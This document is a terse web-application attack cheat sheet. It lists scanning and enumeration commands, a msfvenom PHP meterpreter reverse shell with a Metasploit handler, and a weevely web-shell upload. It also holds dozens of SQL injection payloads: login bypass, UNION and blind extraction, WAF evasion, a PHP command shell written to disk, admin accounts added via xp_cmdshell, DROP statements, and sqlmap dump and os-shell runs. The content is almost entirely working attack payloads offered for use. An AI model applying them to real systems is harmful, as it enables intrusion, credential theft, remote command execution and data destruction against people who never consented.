nikto -h [HOST] -Tuning x
skipfish -o /root/output -S /usr/share/skipfish/dictionaries/complete.wl [HOST:8080]
uniscan -u [HOST] -q
uniscan -u [HOST] -we
Obtains information about emails, source code disclosures, and external hosts.
uniscan -u [HOST] -d
nmap -T4 -A -v [HOST]
WhatWeb recognizes web technologies, such as blogging platforms, email addresses, content management systems (CMS), account IDs, statistics and analytics packages, JavaScript libraries, and embedded devices. It also identifies version numbers, web servers, web framework modules, etc.
whatweb [HOST]
whatweb -v [HOST]
dig [HOST]
lbd [HOST]
nmap -sV --script http-enum [HOST]
Fast-paced enumeration of the hidden files and directories of the target web application using Gobuster
gobuster dir -u [HOST] -w [DICTIONARY]
wpscan --api-token [API Token] --url [HOST] --plugins-detection aggressive --enumerate vp
--enumerate vp: Specifies the enumeration of vulnerable plugins.
msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP Address of Host Machine] LPORT=4444 -f raw
Upload and open the file in the web server...
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST [IP Address of Host Machine]
set LPORT 4444
run
weevely generate [PASSWORD] [FILE PATH]
Upload the shell to the web server...
weevely http://10.10.10.16:8080/dvwa/hackable/uploads/shell.php [PASSWORD]
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
' UNION SELECT 1,'anotheruser','any password', 1--
blah' UNION SELECT 0, username, password, 0 from users --
1 UNION SELECT ALL 1,DB_NAME,3,4--
1 UNION SELECT ALL 1,TABLE_NAME,3,4 from sysobjects where xtype=char(85)--
1 UNION SELECT ALL 1,column_name,3,4 form DB_NAME.information_schema.columns where table_name='EMPLOYEE_TABLE'--
1 UNION SELECT ALL 1COLUMN-NAME-1,3,4 from EMPLOYEE_NAME --
1 or 1=convert(int,(DB_NAME))--
1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))
1 or 1=convert(int, (select top 1 column_name from DBNAME.information_scherma.columns where table_name='TABLE-NAME-1'))--
1 or 1=convert(int, (select top 1 COLUMN-NAME-1 from TABLE-NAME-1))--
1; IF (KEN(USER)=1) WAITFOR DELAY '00:00:10'--
1; IF (KEN(USER)=2) WAITFOR DELAY '00:00:10'--
1; IF (KEN(USER)=3) WAITFOR DELAY '00:00:10'--
...
1; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:5'--
1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:5'--
1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:5'--
...
1; IF (ASCII(lower(substring((USER),2,1)))=97) WAITFOR DELAY '00:00:5'--
1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:5'--
1; IF (ASCII(lower(substring((USER),2,1)))=99) WAITFOR DELAY '00:00:5'--
...
1; IF (ASCII(lower(substring((USER),3,1)))=97) WAITFOR DELAY '00:00:5'--
1; IF (ASCII(lower(substring((USER),3,1)))=98) WAITFOR DELAY '00:00:5'--
1; IF (ASCII(lower(substring((USER),3,1)))=99) WAITFOR DELAY '00:00:5'--
...
1/*union*/union/*select*/select+1,2,3/*
'/**/UN/**/ION/**/SEL/**/ECT/**/password/**/FR/**/OM/**/Users/**/WHE/**/RE/**/username/**/LIKE/**/'admin'--
'OR 'john'='john'
'OR 8 > 4
'OR 5 BETWEEN 4 AND 6
'OR 'apple'='app'+'le'
'OR 'software like 'soft%''
'OR 'asd'>'a'
'OR 'movies'=N'movies'
'OR 'blabla' IN ('blabla')
' union select 1,(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
' or username like char(37)
' union select * from users where login = char(114,111,111,116);
' and 1( if((load_file(char(110,46,101,120,116))<>char(39,39))1,0));
Override the HTTP GET/POST parameters by injecting delimiting characters into the query strings.
1;select+1&id=2,3+from+users+where+id=1--
1+union/*&b=*/select+1,2
1+union/*&b=*/select+1,pass/*&c=*/from+users--
Replace WAF signatures with their synonyms using SQL function.
1+OR=0x50=0x50
1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
'; EXEC ('DRO' + 'P T' + 'AB' + 'LE')
'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
'; EXECUTE CONCAT('INSE','RT US','ER')'
UNION SELECT
'OR'1'='1'
%00' UNION SELECT Password FROM Users WHERE UserName='admin'--'
UnIoN SeLeCt PasSWord fRoM UsErS WhEre useRNAme='JoHn'
; declare @sqlvar nvarchar(70); set @sqlvar = (N'UNI' + N'ON' + N' SELECT' + N'Password'); EXEC(@sqlvar)
2 and 1=(SELECT 1 FROM UserInfo WHERE Password REGEXP '^[a-g]' AND ID=2)
2 and 1=(SELECT 1 FROM UserInfo WHERE Password REGEXP '^[a-h]' AND ID=2)
2 and 1=(SELECT 1 FROM UserInfo WHERE Password REGEXP '^[d-f]' AND ID=2)
2 and 1=(SELECT 1 FROM UserInfo WHERE Password REGEXP '^[e]' AND ID=2)
2 and 1=(SELECT 1 FROM UserInfo WHERE Password LIKE 'd[a-f]%' AND ID=2)
2 and 1=(SELECT 1 FROM UserInfo WHERE Password LIKE 'd[0-9]%' AND ID=2)
2 and 1=(SELECT 1 FROM UserInfo WHERE Password LIKE 'd[4]%' AND ID=2)
INSERT INTO mysql.user (user, host, password) VALUES ('john', 'localhost', PASSWORD('toor'))
CREATE USER john IDENTIFIED BY 'toor'
exec sp_addlogin 'john', 'toor'
exec sp_addsrvrolemember 'john', 'sysadmin'
CREATE USER john IDENTIFIED BY toor TEMPORATY TABLESPACE temp DEFAULT TABLESPACE users;
GRANT CONNECT TO john;
GRANT RESOURCE TO john;
';exec master..xp_cmdshell "net user john toor /add";--
';exec master..xp_cmdshell "net localgroup administrators john /add";--
NULL UNION ALL SELECT LOAD_FILE('/etc/password')/*
NULL UNION ALL SELECT NULL,NULL,NULL,NULL,'<?php system($_GET["command"]);?>' INTO OUTFILE '/var/www/custom_path/shell.php'/*
1';insert into users values ('john','toor'); --
1';create database mydatabase; --
1'; DROP DATABASE mydatabase; --
1'; DROP TABLE users; --
sqlmap -u "[HOST]" --cookie="[COOKIE]" --dbs
-u: Specifies the target URL.
--cookie: Specifies the HTTP cookie header value.
--dbs: Enumerates DBMS databases.
sqlmap -u "[HOST]" --cookie="[COOKIE]" -D [DATABASE] --tables
sqlmap -u "[HOST]" --cookie="[COOKIE]" -D [DATABASE] -T [TABLE] --dump
sqlmap -u "[HOST]" --cookie="[COOKIE]" --os-shell
python3 dsss.py -u "[HOST]" --cookie="[COOKIE]"
-u: Specifies the target URL.
--cookie: Specifies the HTTP cookie header value.
© 2023 javierizquierdovera.com
Licensed under the Apache License, Version 2.0 (LICENSE-APACHE
) or the MIT license (LICENSE-MIT
), at your option.
SPDX-License-Identifier: (Apache-2.0 OR MIT)